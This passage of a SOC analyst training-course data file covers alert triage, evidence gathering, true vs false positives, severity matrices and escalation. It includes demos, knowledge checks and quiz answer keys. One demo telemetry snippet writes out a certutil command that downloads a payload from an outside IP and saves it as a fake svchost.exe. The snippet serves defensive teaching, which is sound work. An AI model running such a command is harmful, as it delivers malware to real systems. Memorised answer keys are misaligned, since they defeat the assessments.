            'Filter the queue by "SLA Expiry Time" ascending to ensure zero tickets breach enterprise SLAs.',
            'Never close an alert without recording the explicit justification in ticket notes.',
            'If an alert rule triggers 100 times daily with 99% false positives, submit a tuning request to Tier 3.',
          ],
        },
        knowledgeCheck: {
          dragDrop: {
            title: 'Order Incoming Alerts by Operational Priority',
            instructions: 'Sort these alerts in order of which one an L1 analyst must investigate first.',
            items: [
              { id: 'p-1', label: '1. CRITICAL (SLA 15m): Unauthorized Domain Admin Account Created', order: 1 },
              { id: 'p-2', label: '2. HIGH (SLA 30m): Encrypted C2 Beaconing from Executive Laptop', order: 2 },
              { id: 'p-3', label: '3. MEDIUM (SLA 2h): Internal IP Port Scan on Segmented Vlan', order: 3 },
              { id: 'p-4', label: '4. LOW (SLA 8h): Single Workstation User Password Lockout', order: 4 },
            ],
            explanation: 'Always prioritize alerts by potential blast radius: Domain compromise -> Host C2 -> Reconnaissance -> User lockouts.',
          },
          matching: {
            title: 'Match Severity Levels to Standard SOC SLA Timeframes',
            instructions: 'Connect each severity level with its standard enterprise response SLA.',
            pairs: [
              { id: 'sev-crit', left: 'Critical Severity (P1)', right: '15 Minutes response / Immediate phone notification' },
              { id: 'sev-high', left: 'High Severity (P2)', right: '30 Minutes response / Immediate escalation review' },
              { id: 'sev-med', left: 'Medium Severity (P3)', right: '2 Hours response / Standard shift investigation' },
              { id: 'sev-low', left: 'Low Severity (P4)', right: '8 Hours response / Informational batch review' },
            ],
            explanation: 'SLA tiers dictate contractual operational tempo and ensure severe threats receive immediate human attention.',
          },
        },
      },
      {
        id: 'topic-2-2',
        unitId: 'unit-2',
        title: 'Evidence Gathering & Context Analysis',
        order: 2,
        estimatedMinutes: 15,
        xpReward: 100,
        theory: {
          summaryLines: [
            'Alerts only tell you THAT something occurred; evidence gathering tells you HOW and WHY.',
            'Analysts gather five foundational forensic artifacts: User context, Host posture, Network destination, Process hierarchy, and Time delta.',
            'Context analysis compares the observed behavior against the target user and system historical baselines.',
            'External enrichment queries (VirusTotal, AbuseIPDB, Whois) add global reputation telemetry to local artifacts.',
            'Synthesizing local logs with external intelligence transforms disconnected data into a coherent threat narrative.',
          ],
          knowMore: {
            title: 'SANS Cyber Defense: Evidence Gathering Techniques for SOC Analysts',
            description: 'In-depth guide on extracting process arguments, network socket state, and registry artifacts during live triage.',
            externalUrl: 'https://www.sans.org/cyber-security-courses/',
            externalLabel: 'SANS Forensic Evidence Reference',
          },
        },
        demo: {
          title: 'Visual Story: The 360-Degree Evidence Gathering Process',
          subtitle: 'Watch how an analyst pieces together evidence across host, network, and identity to solve an alert',
          steps: [
            {
              id: 1,
              stage: '1. Initial Trigger',
              iconName: 'siem',
              title: 'Alert: certutil.exe Download Flagged',
              description: 'Rule triggers on certutil.exe downloading an external file (Living off the Land binary).',
              telemetrySnippet: 'Process: certutil.exe\nCommandLine: certutil.exe -urlcache -split -f http://185.220.101.5/payload.bin C:\\Temp\\svchost.exe',
              highlightText: 'Adversaries abuse native administrative tools (LOLBAS) to bypass application whitelisting.',
            },
            {
              id: 2,
              stage: '2. Parent Process Trace',
              iconName: 'endpoint',
              title: 'Analyst Queries Parent Process Tree',
              description: 'What spawned certutil.exe? The analyst checks parent PID and discovers word.exe spawned cmd.exe.',
              telemetrySnippet: 'Process Tree:\nWINWORD.EXE (PID 3104)\n  └── cmd.exe (PID 6220)\n        └── certutil.exe (PID 8812)',
              highlightText: 'Word spawning a command shell proves malicious document delivery.',
            },
            {
              id: 3,
              stage: '3. Network Reputation',
              iconName: 'server',
              title: 'Enriching External Destination IP',
              description: 'Analyst queries threat intelligence databases for IP 185.220.101.5.',
              telemetrySnippet: 'Threat Intel Report:\nIP: 185.220.101.5 (Netherlands)\nReputation: 100% Malicious (QakBot C2 Infrastructure)\nThreat Actor: Storm-0216',
              highlightText: 'IP intelligence confirms active association with known banking trojan malware.',
            },
            {
              id: 4,
              stage: '4. File Hash Inspection',
              iconName: 'endpoint',
              title: 'Checking Dropped Binary Hash',
              description: 'Analyst calculates SHA256 of C:\\Temp\\svchost.exe and checks endpoint telemetry.',
              telemetrySnippet: 'File Created: C:\\Temp\\svchost.exe\nSHA256: 4a2b9f8e...\nVirusTotal: 58/71 detections (Trojan.Win32.Qakbot)\nExecution Status: Process launched at 10:14:02 UTC',
              highlightText: 'The dropped binary masquerades as legitimate svchost.exe but resides in Temp directory.',
            },
            {
              id: 5,
              stage: '5. Complete Threat Narrative',
              iconName: 'analyst',
              title: 'Synthesis: Confirmed QakBot Malware Infection',
              description: 'Analyst has conclusive proof: Phishing email -> Malicious Word macro -> certutil download -> QakBot execution.',
              telemetrySnippet: 'Case Summary:\nPatient Zero: WS-FIN-12 (User: k.williams)\nMalware: QakBot DLL Loader\nAction: Immediate host isolation & user account lock.',
              highlightText: 'Connecting all evidence layers leaves zero ambiguity for the incident response team.',
            },
          ],
        },
        interactive: {
          title: 'Interactive Evidence Board: Inspect a Suspicious Script Execution',
          scenario: 'An alert fired for "Suspicious VBScript Execution". Examine the 4 evidence cards to build the threat context.',
          cards: [
            {
              id: 'c-user-cont',
              category: 'User',
              label: 'User: r.davis (Human Resources)',
              summary: 'User received external email with subject "Resume_Applicant_882.zip" and extracted contents.',
              detailedFindings: 'User has no technical scripting duties. Opening VBScript files is completely anomalous for HR personnel.',
              severityIndicator: 'Suspicious',
            },
            {
              id: 'c-ip-cont',
              category: 'Source IP',
              label: 'External Connection: 91.240.118.172:8080',
              summary: 'wscript.exe established an immediate HTTP session to an unclassified foreign IP address.',
              detailedFindings: 'IP belongs to a bulletproof VPS provider in Russia. Registered 3 days prior. Traffic shows continuous beacon interval.',
              severityIndicator: 'Malicious',
            },
            {
              id: 'c-event-cont',
              category: 'Event ID',
              label: 'Sysmon Event 1: wscript.exe Execution',
              summary: 'wscript.exe executed script from C:\\Users\\r.davis\\Downloads\\Resume.vbs.',
              detailedFindings: 'Script contained obfuscated PowerShell command that wrote an executable to AppData\\Roaming directory.',
              severityIndicator: 'Malicious',
            },
            {
              id: 'c-timeline-cont',
              category: 'Timeline',
              label: 'Execution to C2 Connection: 4 Seconds',
              summary: '14:22:10 Script opened -> 14:22:12 PowerShell spawned -> 14:22:14 Outbound beacon established.',
              detailedFindings: 'The rapid execution timeline indicates automated payload staging without human delays.',
              severityIndicator: 'Malicious',
            },
          ],
        },
        socContext: {
          title: 'Avoiding the Single-Artifact Trap',
          scenario: 'A junior analyst saw "powershell.exe" and immediately assumed an attack, isolating a production database server that was simply running automated backup jobs.',
          analystMindset: 'Never judge an alert on the binary name alone. Always inspect the parent process, command-line flags, service account credentials, and network destinations together.',
          bestPractices: [
            'Correlate the process with user logon type (Type 2 interactive console vs Type 5 Windows Service).',
            'Cross-examine IP addresses against reverse DNS and enterprise proxy categorization.',
            'Check file paths — legitimate system binaries execute from System32, not from AppData, Temp, or Users\\Public.',
          ],
        },
        knowledgeCheck: {
          dragDrop: {
            title: 'Arrange the Forensic Evidence Gathering Steps',
            instructions: 'Order the evidence gathering sequence an analyst follows when triaging an execution alert.',
            items: [
              { id: 'eg-1', label: '1. Extract Primary Alert Artifacts (Process, User, Hostname, Timestamp)', order: 1 },
              { id: 'eg-2', label: '2. Trace Process Tree to Identify Parent Application (e.g. Word, Browser)', order: 2 },
              { id: 'eg-3', label: '3. Inspect Command-Line Arguments and Decoded Script Payloads', order: 3 },
              { id: 'eg-4', label: '4. Enrich External IP and Domain Reputations via Threat Feeds', order: 4 },
              { id: 'eg-5', label: '5. Compare Observed Activity Against User and Host Normal Baselines', order: 5 },
            ],
            explanation: 'Progressing from the immediate trigger outward to parent processes, arguments, network endpoints, and historical baselines builds a complete evidentiary picture.',
          },
          matching: {
            title: 'Match Evidence Artifacts to Their Forensic Significance',
            instructions: 'Connect each evidence artifact with the specific question it answers for the analyst.',
            pairs: [
              { id: 'art-parent', left: 'Parent Process Name', right: 'Reveals how the binary was initially delivered or launched' },
              { id: 'art-cmd', left: 'Full Command-Line String', right: 'Exposes switches, obfuscated payloads, and target arguments' },
              { id: 'art-hash', left: 'File SHA256 Hash', right: 'Enables global threat intelligence lookups across sandbox feeds' },
              { id: 'art-logon', left: 'Windows LogonType ID', right: 'Determines whether authentication was local console or remote network' },
            ],
            explanation: 'Each artifact answers a distinct forensic question in establishing attacker motives and execution depth.',
          },
        },
      },
      {
        id: 'topic-2-3',
        unitId: 'unit-2',
        title: 'True Positive vs False Positive Triage (Reworked)',
        order: 3,
        estimatedMinutes: 20,
        xpReward: 150,
        theory: {
          summaryLines: [
            'Alert triage centers on a decisive question: Does this alert represent actual malicious activity or benign business operations?',
            'A True Positive (TP) correctly identifies genuine malicious threats or deliberate policy violations requiring mitigation.',
            'A False Positive (FP) occurs when legitimate, benign, or expected activity triggers a detection rule due to broad signature thresholds.',
            'Differentiating TP from FP requires examining user intent, change management approval, file execution paths, and network context.',
            'Closing an alert as False Positive requires documented evidentiary proof that the activity was authorized and non-malicious.',
          ],
          knowMore: {
            title: 'MITRE ATT&CK: Tuning Detections and Minimizing False Positives',
            description: 'Engineering methodologies for balancing detection sensitivity with operational analyst noise reduction.',
            externalUrl: 'https://attack.mitre.org/',
            externalLabel: 'MITRE Detection Engineering',
          },
        },
        demo: {
          title: 'Visual Story: The TP vs FP Decision Tree in Action',
          subtitle: 'Observe side-by-side how identical alert triggers diverge into True Positive vs False Positive based on evidence',
          steps: [
            {
              id: 1,
              stage: '1. Two Identical Alerts',
              iconName: 'siem',
              title: 'Two Separate Alerts: "Multiple Failed Logins Followed by Success"',
              description: 'Alert A fires for user d.miller. Alert B fires for user m.garcia. Both show 10 failed logins followed by a successful authentication.',
              telemetrySnippet: 'Incident A: d.miller | 10x 4625 -> 1x 4624\nIncident B: m.garcia | 10x 4625 -> 1x 4624\nIdentical rule trigger!',
              highlightText: 'Identical alert rules can have completely opposite threat realities.',
            },
            {
              id: 2,
              stage: '2. Investigating Incident A',
              iconName: 'analyst',
              title: 'Incident A Evidence: User Forgotten Password',
              description: 'Source IP is internal corporate DHCP (10.0.12.89). Workstation is assigned laptop. SubStatus is 0xC000006A (bad password typos).',
              telemetrySnippet: 'Incident A Findings:\n- Source IP: 10.0.12.89 (Assigned corporate laptop)\n- Time: 09:02 AM Monday\n- Helpdesk ticket: "User called to unlock account after password expiration"',
              highlightText: 'Expected employee behavior following weekend password expiration.',
            },
            {
              id: 3,
              stage: '3. Incident A Verdict: False Positive',
              iconName: 'analyst',
              title: 'Incident A Closed as Benign False Positive',
              description: 'Analyst documents the verified helpdesk ticket and internal IP, closing Incident A as False Positive.',
              telemetrySnippet: 'Resolution: False Positive\nNotes: User mistyped expired password on assigned device. Verified with helpdesk.\nTicket Closed.',
              highlightText: 'Documenting the verified reason prevents re-investigation.',
            },
            {
              id: 4,
              stage: '4. Investigating Incident B',
              iconName: 'attacker',
              title: 'Incident B Evidence: External Tor Exit Node',
              description: 'Source IP is 185.220.101.5 (Tor Exit Node). User m.garcia is actively sitting in the office in Dallas. Successful login was from Romania.',
              telemetrySnippet: 'Incident B Findings:\n- Source IP: 185.220.101.5 (Tor Exit Node / Romania)\n- Local User Location: Dallas, Texas (Physical badge swipe at 08:45 AM)\n- Impossible Travel: Texas to Romania in 15 minutes',
              highlightText: 'Impossible travel and Tor source IP prove credential stuffing compromise.',
            },
            {
              id: 5,
              stage: '5. Incident B Verdict: True Positive',
              iconName: 'server',
              title: 'Incident B Escalated: Account Compromised',
              description: 'Analyst revokes active user session, forces password reset, and escalates to L2 for session audit.',
              telemetrySnippet: 'Resolution: True Positive (Credential Compromise)\nAction: Session Revoked, MFA Reset Forced, Host Isolated.\nTicket Escalated to P1 Incident.',
              highlightText: 'Same alert trigger, but forensic evidence proved active adversary intrusion.',
            },
          ],
        },
        interactive: {
          title: 'Interactive Triage Scenarios: Evaluate Real-World Evidence',
          scenario: 'Review each evidence scenario below. Determine whether the artifacts prove a True Positive attack or a benign False Positive.',
          cards: [
            {
              id: 'tf-case-1',
              category: 'User',
              label: 'Case 1: Admin Runs Scheduled Robocopy Backup',
              summary: 'Alert: "Mass File Access in Restricted Share". Admin executed robocopy during approved Saturday night maintenance window.',
              detailedFindings: 'Change management ticket approved: CHG-9021. Script run by verified domain backup service account. Verdict: False Positive.',
              severityIndicator: 'Normal',
            },
            {
              id: 'tf-case-2',
              category: 'Source IP',
              label: 'Case 2: 50 Failed Logins Across 20 Accounts from Single External IP',
              summary: 'Alert: "Password Spraying Detected". Source IP is external VPN gateway from an anonymous bulletproof host in Lithuania.',
              detailedFindings: 'Targeted usernames match company LinkedIn directory. Zero successful logins. Classic automated adversary password spray. Verdict: True Positive.',
              severityIndicator: 'Malicious',
            },
            {
              id: 'tf-case-3',
              category: 'Event ID',
              label: 'Case 3: PowerShell Script Executes Encoded Base64 Payload',
              summary: 'Alert: "Encoded PowerShell Execution". Process spawned by winword.exe in user Downloads folder.',
              detailedFindings: 'Payload decompiles to an in-memory reflective DLL loader connecting to dynamic DNS domain. Verified True Positive malware execution.',
              severityIndicator: 'Malicious',
            },
            {
              id: 'tf-case-4',
              category: 'Timeline',
              label: 'Case 4: Vulnerability Scanner Audits Production Subnet',
              summary: 'Alert: "Port Sweep & Web Exploit Attempt". Source IP is 10.0.100.50 (Enterprise Nessus Scanner).',
              detailedFindings: 'Scheduled vulnerability scan authorized by Chief Information Security Officer. IPs match internal scanner whitelist. Verdict: False Positive.',
              severityIndicator: 'Normal',
            },
          ],
        },
        socContext: {
          title: 'The Danger of Closing True Positives as False Positives',
          scenario: 'Closing a True Positive alert as False Positive (a False Negative) allows an attacker to dwell in the corporate network undetected for an average of 200+ days.',
          analystMindset: 'Treat every alert as guilty until proven innocent by verifiable corroborating evidence. If you cannot explain why an alert fired, you cannot close it.',
          bestPractices: [
            'Never close an alert as False Positive based on a user verbally saying "it was probably just me". Verify with logs.',
            'Always inspect the source IP reputation — legitimate corporate activity originates from internal subnets or company VPNs.',
            'If an authorized tool is repeatedly triggering alerts, request a rule exception rather than repeatedly clicking false positive.',
          ],
        },
        knowledgeCheck: {
          triageScenario: {
            id: 'triage-scen-1',
            alertName: 'Alert: Multiple Failed Logins on Executive Account (Event ID 4625)',
            severity: 'HIGH',
            scenarioText: 'At 02:45 AM local time, an alert triggered for executive account "c.foster" with 12 failed authentication attempts within 60 seconds against the corporate Outlook Web Access (OWA) portal.',
            evidenceItems: [
              { label: 'Target Account', value: 'c.foster (Chief Technology Officer)', insight: 'Executive account with enterprise-wide confidential access.' },
              { label: 'Source Network Address', value: '185.220.101.44 (Tor Exit Node)', insight: 'Known anonymizing routing node located in Frankfurt, Germany.' },
              { label: 'Logon Type', value: 'Type 3 (Network Authentication)', insight: 'Remote authentication attempted over HTTPS against public web portal.' },
              { label: 'SubStatus Code', value: '0xC000006A (Bad Password)', insight: '12 password variations attempted in alphabetical dictionary order.' },
              { label: 'Subsequent Activity', value: 'No Event 4624 (Logon Success)', insight: 'Account locked by policy; no successful login achieved.' },
            ],
            correctVerdict: 'TRUE_POSITIVE',
            rationale: 'The incoming attempts originated from a verified external Tor exit node using automated rapid password variations at 02:45 AM. Even though the adversary did not successfully log in, the alert correctly detected hostile credential attack activity (True Positive Password Attack).',
            analystAction: 'Block the source IP on perimeter firewalls, notify the CTO of targeted credential attacks, and verify that multi-factor authentication (MFA) remains enforced.',
          },
        },
      },
    ],
    assessment: {
      id: 'unit-2-assessment',
      title: 'Unit 2 Assessment: Alert Triage & Evidence Investigation',
      passingScore: 80,
      xpReward: 200,
      questions: [
        {
          id: 'u2-q1',
          question: 'What defines a True Positive alert in security operations?',
          options: [
            'An alert that triggered on an authorized vulnerability scan',
            'An alert that correctly identified actual malicious threat activity or a security policy violation',
            'An alert that fired because an employee forgot their password',
            'An alert generated when a printer runs out of paper',
          ],
          correctAnswer: 1,
          explanation: 'A True Positive correctly identifies actual malicious activity or an authentic security incident.',
        },
        {
          id: 'u2-q2',
          question: 'What is the immediate priority when managing an alert queue with concurrent tickets?',
          options: [
            'Close the easiest Low severity tickets first to show high ticket numbers',
            'Prioritize Critical and High alerts according to strict SLA timeframes and threat severity',
            'Wait until the end of the shift to review all alerts at once',
            'Forward all alerts to senior management without opening them',
          ],
          correctAnswer: 1,
          explanation: 'Alert triage must follow severity and SLA clocks top-down to contain critical threats before damage spreads.',
        },
        {
          id: 'u2-q3',
          question: 'A scheduled Nessus vulnerability scanner triggers a "Web Directory Traversal" alert. What is the correct triage classification?',
          options: [
            'True Positive Critical Incident requiring law enforcement notification',
            'False Positive / Benign Activity, because the scan is authorized and originated from a verified internal scanner IP',
            'Ignore the alert completely and do not document anything in the ticket',
            'Wipe the hard drive of the vulnerability scanner immediately',
          ],
          correctAnswer: 1,
          explanation: 'Authorized vulnerability scans triggering signatures represent benign testing (False Positive for malicious intrusion).',
        },
        {
          id: 'u2-q4',
          question: 'Why must analysts examine the parent process when investigating script execution (e.g. powershell.exe)?',
          options: [
            'Because parent processes are always Microsoft Word',
            'To understand what initiated the script — such as an Office macro, web browser, or scheduled task',
            'Because parent processes do not generate event logs',
            'To check the color of the analyst desktop theme',
          ],
          correctAnswer: 1,
          explanation: 'The parent process reveals the delivery vector — an Office application spawning a shell strongly indicates a malicious document.',
        },
        {
          id: 'u2-q5',
          question: 'What is the danger of closing an alert as False Positive without verifying evidence?',
          options: [
            'The ticket number becomes an odd number',
            'An active adversary may dwell inside the network undetected, resulting in massive data theft or ransomware',
            'The SIEM automatically turns off all firewalls',
            'There is no danger; false positives have no operational impact',
          ],
          correctAnswer: 1,
          explanation: 'Miscalibrating a True Positive as a False Positive creates an uncontained intrusion (False Negative), allowing adversaries free reign.',
        },
      ],
    },
  },

  {
    id: 'unit-3',
    unitNumber: 3,
    title: 'Unit 3: Severity, Escalation & Incident Documentation',
    description: 'Master enterprise severity matrices, SLA adherence, escalation protocols, and professional incident ticketing standards.',
    estimatedHours: 2,
    topics: [
      {
        id: 'topic-3-1',
        unitId: 'unit-3',
        title: 'Severity Matrix & SLA Handling',
        order: 1,
        estimatedMinutes: 15,
        xpReward: 100,
        theory: {
          summaryLines: [
            'Severity matrices classify security incidents by evaluating potential business impact and threat exploitability.',
            'Critical (P1) incidents threaten core business operations, domain controllers, or confidential data stores.',
            'High (P2) incidents represent contained intrusions, active malware execution, or privilege escalation on endpoints.',
            'Medium (P3) incidents involve localized anomalies, non-critical policy violations, or suspicious reconnaissance.',
            'Strict adherence to contractual SLAs ensures accountability and guarantees response speeds across 24/7/365 operations.',
          ],
          knowMore: {
            title: 'NIST Special Publication 800-61: Incident Severity Rating Systems',
            description: 'Federal guidance on grading incident impact, functional impact, and information loss metrics.',
            externalUrl: 'https://csrc.nist.gov/',
            externalLabel: 'NIST Incident Severity Matrix',
          },
        },
        demo: {
          title: 'Visual Story: Calculating Severity and SLA Countdown',
          subtitle: 'Observe how an incident score changes in real time as new business context is discovered',
          steps: [
            {
              id: 1,
              stage: '1. Inbound Alert',
              iconName: 'siem',
              title: 'Initial Alert: "Malware Detected"',
              description: 'Alert fires on workstation FIN-WS-02 for Trojan.Generic. Initial automated rating is Medium (P3).',
              telemetrySnippet: 'Rule: EDR Malware Flag\nHost: FIN-WS-02\nInitial Severity: MEDIUM (P3)\nDefault SLA: 2 Hours',
              highlightText: 'Automated scores evaluate file signatures, not business criticality.',
            },
            {
              id: 2,
              stage: '2. Asset Context',
              iconName: 'server',
              title: 'Asset Identified as Treasury Payment Gateway',
              description: 'Analyst checks asset registry: FIN-WS-02 processes multi-million dollar SWIFT wire transfers daily.',
              telemetrySnippet: 'Asset Database Lookup:\nHostname: FIN-WS-02\nAsset Class: Tier 0 Mission Critical (SWIFT Wire Terminal)\nData Classification: HIGHLY CONFIDENTIAL',
              highlightText: 'Critical asset involvement automatically elevates severity rating.',
            },
            {
              id: 3,
              stage: '3. Severity Escalation',
              iconName: 'analyst',
              title: 'Severity Elevated from Medium to Critical (P1)',
              description: 'Because the malware is executing on a Tier 0 financial terminal, the analyst escalates severity to Critical.',
              telemetrySnippet: 'Severity Updated: CRITICAL (P1)\nSLA Timer: Adjusted to 15 Minutes\nStatus: Immediate Escalation Required',
              highlightText: 'Contextual risk determines real severity, not default vendor labels.',
            },
            {
              id: 4,
              stage: '4. Containment Execution',
              iconName: 'endpoint',
              title: 'Immediate Network Containment',
              description: 'Analyst triggers network quarantine via EDR within 6 minutes of alert arrival, beating the 15-minute SLA.',
              telemetrySnippet: 'Action: Network Isolation Active\nTimestamp: 11:06:12 UTC (Elapsed: 6m 12s)\nSLA Compliance: Met (Well within 15m limit)',
              highlightText: 'Rapid containment prevents lateral movement across wire transfer networks.',
            },
            {
              id: 5,
              stage: '5. Executive Escalation',
              iconName: 'analyst',
              title: 'Incident Declared to CISO and IR Lead',
              description: 'Analyst files the emergency bridge notification and triggers the corporate major incident response protocol.',
              telemetrySnippet: 'Incident Ticket #9810\nSeverity: P1 Critical\nImpact: Treasury Terminal Contained\nBridge: Active with CISO & Lead Responders',
              highlightText: 'Disciplined severity matrixing protects multi-million dollar business assets.',
            },
          ],
        },
        interactive: {
          title: 'Interactive Severity Scoring: Grade Incident Impact',
          scenario: 'Evaluate the business impact of the 4 security incidents below. Determine their proper priority rating (P1 to P4).',
          cards: [
            {
              id: 'sev-c1',
              category: 'Event ID',
              label: 'Active Ransomware on Primary Patient Care Hospital Server',
              summary: 'Medical database files being encrypted in real time. Clinical operations at risk.',
              detailedFindings: 'Life-safety impact. Highest possible severity: P1 Critical. SLA response must occur within 15 minutes.',
              severityIndicator: 'Malicious',
            },
            {
              id: 'sev-c2',
              category: 'User',
              label: 'Privilege Escalation on Single Marketing Laptop',
              summary: 'Local admin account compromised on non-critical workstation. Machine isolated by EDR.',
              detailedFindings: 'Contained threat on standard workstation. Severity: P2 High. SLA response: 30 minutes.',
              severityIndicator: 'Suspicious',
            },
            {
              id: 'sev-c3',
              category: 'Source IP',
              label: 'External Scanner Scanning Unopened Firewall Ports',
              summary: 'Automated internet bot scanning public IPs. All packets dropped by default firewall rule.',
              detailedFindings: 'Standard internet background noise. Zero penetration. Severity: P4 Low. SLA: 8 hours.',
              severityIndicator: 'Normal',
            },
            {
              id: 'sev-c4',
              category: 'Timeline',
              label: 'Developer Running Unapproved Python Web Scraping Tool',
              summary: 'Script downloading competitor public catalog data. No credentials or enterprise data involved.',
              detailedFindings: 'Minor internal policy violation. Severity: P3 Medium. SLA response: 2 hours.',
              severityIndicator: 'Suspicious',
            },
          ],
        },
        socContext: {
          title: 'Asset Criticality Overrules Raw Tool Scores',
          scenario: 'A raw port scan on a test dev server is Low severity. The exact same port scan on a nuclear power plant turbine controller is a Critical emergency.',
          analystMindset: 'Never look at an alert in a vacuum. Always factor in: 1. Asset criticality, 2. User privilege level, 3. Regulated data exposure (GDPR/HIPAA/PCI-DSS).',
          bestPractices: [
            'Consult the enterprise CMDB (Configuration Management Database) to check server classification.',
            'Keep emergency phone numbers for Tier 0 asset owners pinned to your analyst desk.',
            'Record the exact SLA acknowledgment and containment timestamps in every ticket.',
          ],
        },
        knowledgeCheck: {
          dragDrop: {
            title: 'Arrange Incident Severity Rankings (Highest to Lowest)',
            instructions: 'Sort the priority levels from most urgent business risk to least urgent.',
            items: [
              { id: 's-1', label: '1. P1 Critical: Core business interruption / DC compromise (SLA 15m)', order: 1 },
              { id: 's-2', label: '2. P2 High: Active malware / Confirmed intrusion on endpoints (SLA 30m)', order: 2 },
              { id: 's-3', label: '3. P3 Medium: Localized anomalies / Non-critical policy violations (SLA 2h)', order: 3 },
              { id: 's-4', label: '4. P4 Low: Routine informational events / Benign internet scans (SLA 8h)', order: 4 },
            ],
            explanation: 'Operational prioritization ensures the most catastrophic risks receive emergency resources first.',
          },
          matching: {
            title: 'Match Incident Scenarios to Their Severity Classification',
            instructions: 'Connect each real-world situation with its accurate severity rating.',
            pairs: [
              { id: 'scen-crit', left: 'Ransomware encrypting Domain Controller', right: 'P1 Critical (Immediate emergency response)' },
              { id: 'scen-high', left: 'Mimikatz memory dump on executive laptop', right: 'P2 High (Host isolated, 30m response)' },
              { id: 'scen-med', left: 'Employee testing unapproved VPN client', right: 'P3 Medium (Policy violation, 2h response)' },
              { id: 'scen-low', left: 'Firewall blocking random external ping', right: 'P4 Low (Benign noise, informational)' },
            ],
            explanation: 'Accurate grading prevents SOC resource misallocation during major crisis situations.',
          },
        },
      },
      {
        id: 'topic-3-2',
        unitId: 'unit-3',
        title: 'Escalation Protocols & Handoffs',
        order: 2,
        estimatedMinutes: 15,
        xpReward: 100,
        theory: {
          summaryLines: [
            'Escalation protocols define the exact operational bridges connecting frontline analysts to senior incident response commanders.',
            'Warm handoffs require active voice confirmation and ticket synchronization when transferring active P1/P2 incidents.',
            'Cold handoffs occur asynchronously via ticketing queues for lower-severity tickets during shift changes.',
            'Clear operational runbooks dictate when to notify legal counsel, human resources, external forensics, and law enforcement.',
            'Flawless handoffs eliminate communication black holes where active intrusions could otherwise linger unaddressed.',
          ],
          knowMore: {
            title: 'NIST Computer Security Incident Handling Guide - Communication Plan',
            description: 'Framework for managing incident communications with internal executives, external regulators, and technical teams.',
            externalUrl: 'https://csrc.nist.gov/publications/detail/sp/800-61/rev-2/final',
            externalLabel: 'NIST Incident Communications Guide',
          },
        },
        demo: {
          title: 'Visual Story: The High-Stakes Escalation Handoff',
          subtitle: 'Observe how an L1 analyst executes a warm handoff to Tier 2 during an active lateral movement event',
          steps: [
            {
              id: 1,
              stage: '1. Incident Scoped',
              iconName: 'analyst',
              title: 'L1 Confirms Lateral Movement Underway',
              description: 'L1 analyst detects PsExec execution moving from compromised workstation to file server.',
              telemetrySnippet: 'Event ID 7045: New Service Installed\nServiceName: PSEXESVC\nSource: WS-FIN-04 -> Target: SRV-FILE-01\nAction: Immediate Escalation Required',
              highlightText: 'Lateral movement requires multi-host coordination beyond single L1 triage.',
            },
            {
              id: 2,
              stage: '2. Incident Formatted',
              iconName: 'server',
              title: 'L1 Fills 5-W Incident Dossier',
              description: 'L1 compiles all observed hashes, IP addresses, parent processes, and affected hostnames into the escalation ticket.',
              telemetrySnippet: 'Escalation Summary:\n- WHO: Compromised user svc_deploy\n- WHAT: PsExec lateral movement and batch script execution\n- WHERE: WS-FIN-04 to SRV-FILE-01\n- WHEN: 14:12:02 to 14:14:10 UTC\n- WHY: Malicious service creation confirmed in Event 7045',
              highlightText: 'Structured 5-W summaries give the incoming responder complete situational awareness.',
            },
            {
              id: 3,
              stage: '3. Warm Phone Transfer',
              iconName: 'analyst',
              title: 'Direct Voice Confirmation with Tier 2 Lead',
              description: 'L1 initiates a direct call with Tier 2 on-call responder: "Incident #9842 is active lateral movement; both hosts isolated."',
              telemetrySnippet: 'Voice Handoff Checklist:\n[✓] Confirmed ticket #9842 accepted\n[✓] Both hosts confirmed isolated\n[✓] Incident lead: Sarah Jenkins (Tier 2)',
              highlightText: 'Warm handoffs require verbal confirmation to ensure the ticket is actively being worked.',
            },
            {
              id: 4,
              stage: '4. Shift Change Synchronization',
              iconName: 'siem',
              title: 'Shift Change Log Updated',
              description: 'L1 logs the transfer in the daily shift passdown notes so the incoming shift supervisor has full visibility.',
              telemetrySnippet: 'Shift Passdown Log:\nShift: Day Shift -> Night Shift\nActive Escalations: 1 (Incident #9842 with Tier 2)\nQueue Status: 0 Critical alerts remaining',
              highlightText: 'Shift handoffs ensure zero incidents fall through the cracks during personnel turnover.',
            },
            {
              id: 5,
              stage: '5. Resolution Confirmation',
              iconName: 'analyst',
              title: 'Tier 2 Confirms Containment Complete',
              description: 'Tier 2 notifies L1 that credentials have been revoked and all persistence artifacts were purged.',
              telemetrySnippet: 'Incident Update:\nContainment: Successful\nThreat Actor: Evicted\nTicket: Transferred to post-incident review phase',
              highlightText: 'Closed communication loops maintain trust across tiered operations.',
            },
          ],
        },
        interactive: {
          title: 'Interactive Escalation Protocol: Identify the Missing Handoff Element',
          scenario: 'Review each escalation ticket scenario. Inspect the cards to determine if the handoff meets professional SOC standards.',
          cards: [
            {
              id: 'ho-1',
              category: 'User',
              label: 'Handoff A: "Suspicious user activity, please check"',
              summary: 'L1 escalated ticket with no hostname, no timestamp, and no process arguments.',
              detailedFindings: 'FAILED HANDOFF. Incomplete notes force Tier 2 to waste 20 minutes re-running basic queries. Must include 5-W summary.',
              severityIndicator: 'Malicious',
            },
            {
              id: 'ho-2',
              category: 'Event ID',
              label: 'Handoff B: Complete 5-W Incident Package',
              summary: 'Includes exact UTC timeline, Sysmon Event 1 command line, infected hostnames, and hash reports.',
              detailedFindings: 'EXCELLENT HANDOFF. Tier 2 can initiate containment immediately without delay.',
              severityIndicator: 'Normal',
            },
            {
              id: 'ho-3',
              category: 'Source IP',
              label: 'Handoff C: Critical Incident Escalated via Slack Message Only',
              summary: 'L1 sent a chat message on Slack but never opened an official ticket in the ticketing platform.',
              detailedFindings: 'FAILED PROTOCOL. Critical incidents must be tracked in the official ITSM system for auditability and SLA compliance.',
              severityIndicator: 'Malicious',
            },
            {
              id: 'ho-4',
              category: 'Timeline',
              label: 'Handoff D: Shift Turnover Passdown Meeting',
              summary: 'Outgoing shift briefs incoming shift on 3 open tickets, active maintenance windows, and queue backlog.',
              detailedFindings: 'STANDARD PROCEDURE. Synchronous shift handoff ensures operational continuity.',
              severityIndicator: 'Normal',
            },
          ],
        },
        socContext: {
          title: 'The "Throw It Over the Fence" Mentality',
          scenario: 'Unprofessional analysts treat escalation as an easy way to dump difficult tickets onto someone else without doing basic triage.',
          analystMindset: 'As an L1 analyst, you own the ticket until Tier 2 explicitly accepts ownership. Never mark a ticket escalated without verifying that someone has taken responsibility.',
          bestPractices: [
            'Include the exact search query and raw log lines in the escalation ticket.',
            'For Critical (P1) incidents, make voice contact immediately — do not rely solely on email notifications.',
